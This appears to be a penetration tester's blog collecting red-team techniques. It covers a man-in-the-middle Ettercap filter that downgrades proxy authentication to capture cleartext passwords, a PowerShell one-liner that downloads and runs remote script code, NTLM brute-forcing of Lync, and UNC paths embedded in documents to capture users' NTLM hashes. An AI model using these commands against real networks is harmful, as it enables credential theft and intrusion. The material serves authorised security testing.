Hack Whack and Smack

CVE-2018-5240 – Symantec Management Agent (Altiris) Privilege Escalation

In case you missed it, I found a zero day vulnerability in Altiris which allows a low level user to elevate privileges to SYSTEM on any host governed by Altiris.

For more information on the vulnerability check out the Nettitude labs post below.

https://labs.nettitude.com/blog/cve-2018-5240-symantec-management-agent-altiris-privilege-escalation/

Symantec have released some notes on the vulnerability here:

https://support.symantec.com/en_US/article.SYMSA1456.html

Speeding up Proxychains with Nmap / Xargs

So for a while now I’ve wanted a way to better use Nmap with proxychains and essentially I’ve resulted in a fairly simple one-liner that has worked for me for a while now on basic port scanning. It’s a trivial concept but really does speed up the process with no negative affect from what I can tell. Obviously you have to be careful on how many threads you permit with Xargs but other than that its pretty straight forward.

A couple of options that you may consider when pivoting with proxychains is possibly multiple hosts with a low number of ports or the alternative being a large amount of ports against one host. Depending on your usage may depend on how you use it because you always have to remember how stealthy you want to be before doing this type of attack. If you’re using this on an internal pentest then you may not worry so much about stealth, but if you’re running this on a Red Team engagement you will want to manipulate the Nmap flags accordingly.

Using the traditional way of running proxychains with Nmap it took 193.62 seconds to finish. An example of this usage has been shown below:

proxychains nmap -p 1-1000 -sT -Pn --open -n -T4 --min-parallelism 100 --min-rate 1 --oG proxychains_nmap_old --append-output <IP Address>

Bringing Xargs into the loop with a thread count of 50 dramatically improves the results and only took 9 seconds to complete. An example of this usage has been shown below:

seq 1 1000 | xargs -P 50 -I{} proxychains nmap -p {} -sT -Pn --open -n -T4 --min-parallelism 100 --min-rate 1 --oG proxychains_nmap --append-output <IP Address>

If you want to run multiple ports or port ranges against multiple hosts you could use the following alternative:

seq 1 254 | xargs -P 50 -I{} proxychains nmap -p 80,443,3389,445,22 -sT -Pn --open -n -T4 --min-parallelism 100 --min-rate 1 --oG proxychains_nmap --append-output 192.168.1.{}

Then grep the output for open ports:

grep

Clear Text Proxy Auth = Passwords

Quick blog, in response to a conversation I had. Where I was informed that this would be a cool thing to share. Recently, I was doing a simulated attack, playing the part of an individual who had gained access to a customer’s facilities. This customer had the usual stuff such as LLMNR spoofing etc which was good for getting hashes, but I needed access quickly to exfiltrate as much data as possible prior to detection. Carrying out a simple man in the middle against some targeted networks, I say targeted because the company deployed small department/functional VLANs, so it literally meant moving desks to find more victims…. I saw proxy authentication for company users as they were browsing the internet. The response to every request was a HTTP 407 proxy authenticate, providing the options to negotiate NTLM or BASIC. The users were all on the domain and NTLM was taking precedence. Therefore, I would see the hash being transmitted in the response. Great more hashes…..

That was when I though wait a minute…I shouldn’t see any of this traffic. It’s over HTTP!!!!!! I can modify the proxy authentication options in transit.

I created the following Ettercap filter as shown below and changed everything to BASIC. Obviously with BASIC authentication the user is going to be asked for their credentials. One of my colleague actually said no users will put there details in as its too suspicious…..and that was when the Base64 encoded username and password appeared on my Wireshark screen for an individual working in the Cyber Crime Team.

The filter:

E-Filter

To compile and run the filter use the following syntax:

etterfilter etter.filter.proxy -o proxy2.ef
ettercap -T -q -F proxy2.ef -M ARP /Target-IP// ///

Service-Perms in Powershell

Updated my Service-Perms.exe to Powershell, grab a copy here:

https://github.com/benpturner/h00k/blob/master/powershell/Service-Perms.ps1 

Usage direct from the Internet within Powershell:

IEX (new-object system.net.webclient).downloadstring("https://raw.githubusercontent.com/benpturner/h00k/master/powershell/Service-Perms.ps1"); Get-ServicePerms

ps

Outputs an HTML

ps2

PoshC2 – Powershell C2

A new tool written by @benpturner (me) and @davehardy20!

poshc2

poshc2-ih

PoshC2 is a proxy aware C2 framework written completely in PowerShell to aid penetration testers with red teaming, post-exploitation and lateral movement. The tools and modules were developed off the back of our successful PowerShell sessions and payload types for the Metasploit Framework. PowerShell was chosen as the base language as it provides all of the functionality and rich features required without needing to introduce multiple languages to the framework.

More information on:

https://www.github.com/Nettitude/PoshC2/wiki

https://www.github.com/Nettitude/PoshC2

https://labs.nettitude.com/tools/poshc2/ 

Password Generator – L337’r

Password Generation Tool

For most organisations one of the most prevalent security concerns remains users selection of secure passwords. Even when restricted through a reasonable password policy, users seem to continue to select passwords with some relevance to the geography of the area, the name of the business or popular sporting/hobbyist interests specific to the region.

How

Mutation through substitution is a common password generation technique. This is the process of maintaining a word of relevance but increasing the entropy by substituting letters for numbers or special characters. An example of this would be taking the word ‘password’ and through common substation routines, transitioning the word to be ‘Pa55w0rd’. This is something that is far to commonly seen during engagements, the other interesting factor is that the mutated version of the password meets Microsoft’s complexity guidelines as it details 3 of the 4 main changes a password should include (uppercase, lowercase, number and special character).

Microsoft Guidelines – https://technet.microsoft.com/en-gb/library/cc786468%28v=ws.10%29.aspx

The Tool

In combination with a number of scenarios encountered during engagements, we have created a tool that generates a mutated password list from one word. The idea behind the tool was to keep the code simplistic to allow easy on site modifications as further details about the company password policy become clear.

The tool has three main workflows:

Substitution Through Miniature Dictionary (limited substitution) –mini

The Miniature dictionary includes a subset of the maximum dictionary and focuses on swapping only common numbers and symbols. While also flipping the first character between uppercase and lowercase. This is specific to the way most users select passwords, utilising a uppercase character as the first letter in their password.

Substitution Through Maximum Dictionary (increased substitution) –maxi

The Maximum dictionary includes swapping all characters between uppercase and lowercase and swaps letters for common numbers and symbols.

Replace functionality (limited to special characters) –replace

The replace functionality is also looped into the two other dictionary functions but is a function in its own right. The replace functionality was specific to a recent engagement where a password was pulled from memory but had a special character that was of an unknown character set. The password included a square character that was unusable. Crunch was initially used to create a wordlist that took the main word and applied substitution of all common special characters in place of the square. Therefore it was obvious from that point that the replace functionality should make it into this tool.

Additional sub mutation routines

–range – The range option is used to add numbers (of a range) to the end of each password.

–suffix – The suffix option is used to append a suffix to the end of each password. This is common in organisations that utilise either dates or suffixes within passwords.

It was noted on a previous engagements that a service account password would always end with ‘_svc’.

–order – The order option allows the specification of an order of application for the three additional functions (–range, –replace and –suffix). Therefore you can specify a password that replaces a end character with all special characters, then includes a range of 0-10 and finally adds a suffix. The default order of the order option is dictionary, replace, range and suffix (drns).

 

While this is not the first tool that provides mutation capability, the idea was that it is easy to use, flexible and open to on the fly changes as required. We like to think of it as the square wheel of password generation tools – so without further ado, a basic demo:

We even created a help page:

leetme - help

The following example shows a limited output of what you can expect the tool to generate:

python leetme.py –mini –range 3 password

 

leetme - example

The script can be downloaded on from the tools page TOOLS

Also a wee shout out to modulo who helped write the script.

CVE2015-2342 and Some other stuff

Recently, well a while a go I had some vulnerabilities published. These were published elsewhere and due to extreme laziness I decided not to publish it here. Anyway, thought I would stick links in here to point back to the vulns.

CVE2015-2342

2 Others That we released (bit more low key)

Mitel CCMWeb Unauthenticated Local File Inclusion7 Elements

Mitel CCMWeb OpenRedirect7 Elements

There are some others too but there not released yet, I will try to add them quicker this time around ;-P

Brute-forcing Microsoft Lync via NTLM

Ok, so there is good reason why Lync should not be accessible over the Internet similarly to any single factor system. BRUTE-FORCE will usually prevail!!!!

I installed burp’s certificate on my Windows host and attempted to login from Lync (From this I was an HTTP NTLM Login request to https://lyncwebact.customer.com/WebTicket/WebTicketService.svc).

NTLM like many other services is made fairly simple to brute-force or attempt one password guess against many accounts. I have used hydra for this once before but a colleague recently wrote a pretty decent python script that makes it even easier and you don’t need to know all the switches etc (https://github.com/strawp/random-scripts/blob/master/ntlm-botherer.py).

Anyway, to make obtaining the NTLM url simple I wrote a quick python script that located the company DNS records for lyncdiscover and then finds the NTLM url as shown below:

lyncmicrosoft

https://github.com/benpturner/h00k/blob/master/python/lyncdiscover.py

Parsing Nessus to find Java Remote Class Loading

On every internal pentest I perform I always find myself searching through lots of Nessus findings to actually get the output I want, so I wrote a script. This script is piggy backed of a cool python class called dotnessus_v2 parser (http://code.google.com/p/pynessus/). Basically my script takes a Nessus file as the input and parses the RMI Registry and RMI Object detection plugins and creates you a nice easy Metasploit RC file that runs the auxiliary module against all affected hosts and ports without any user interaction, allowing you to crack on with other stuff while you wait for positive results, e.g. Pwnable services that allow remote class loading.

The reason I did this was because in a standard /24 cidr range your likely to get around 30-50 ports on 20 or so hosts if the environment if fairly populated. This speeds the pwnage process up ten fold. In addition to this it will also create you a webhosts.txt file that lists all the HTTP/HTTPS services that Nessus finds so that you can later run more scripts against these, e.g. I often use my screenshot script to take a screendump of all available web services or nikto each host etc.

Anyway, here is the script in action:

nessus

https://github.com/benpturner/h00k/blob/master/python/NessusParser/nessus-parser.py

Malicious UNC Paths (SMB) / Bad Egress / No-Split VPN

When attempting social engineering or red teaming engagements I often choose to embed various HTTP/UNC paths inside an attachment, e.g. Word/Excel/PDF. The best thing about embedding this malicious URL is that it does not warn the user of any external content loading. You can also do this directly inside an email but the user will get warned of loading external content, especially inside outlook which is the most widely used email client in a corporate environment. Other vendor settings do vary so it’s worth doing reconnaissance on your target before aiming to penetrate their external defenses.

Email reconnaissance can be done via embedding a simple HTTP request or even viewing email headers from an automated response or out-of-office reply.

The reason this is also quite interesting to me is that companies often have great egress controls inside their organisation, but when working remotely in a coffee shop, working from home or over a smartphone tether the employees are free to connect without any form of security or logging from a perimeter firewall perspective. Companies should deploy and enforce (via technical controls) no-split VPN connections in order to control the traffic flow between their own assets. This not only helps maintain a controlled logging and monitoring solution but also keeps enforced the integrity of traffic to and from the device. It should not be left the employees home firewall or in most cases a default BT Homehub router.

Example:

Create a new document (test.docx) and embed a UNC path that is located on an Internet facing host, e.g. \\204.200.200.200\logo.png

This can be done using the Metasploit module word_unc_injector (auxiliary/docx/word_unc_injector) or manually via the GUI.

unc

Then setup the SMB auxiliary module (auxiliary/server/capture/smb) in order to capture the client handshake. The beauty with domain configured UNC paths is the ability to capture the NTLM challenge/response packet which can be used to perform an off-line brute-force attack against their password. Again, the beauty with this is as long as you haven’t sent the user anything out of the ordinary then the end-user will not suspect anything at all and this will allow you time to crack their password.

smb

Once you have domain user accounts and passwords you can go on the hunt for any externally facing single factor systems, such as Microsoft Lync, Webmail, or any other single factor system available to the Internet.

The moral of the story is clients should not be relying on end-user’s to implement secure technical controls from their home offices, nor should you rely on a single factor system in this day and age.

There is a million other things that can be done once you have access to systems such as webmail, which includes sending embedded UNC paths to the entire organisation as if you send from a trusted address, the email client will automatically attempt to download the image over SMB and you will have a air-strike of hashes from the target organization.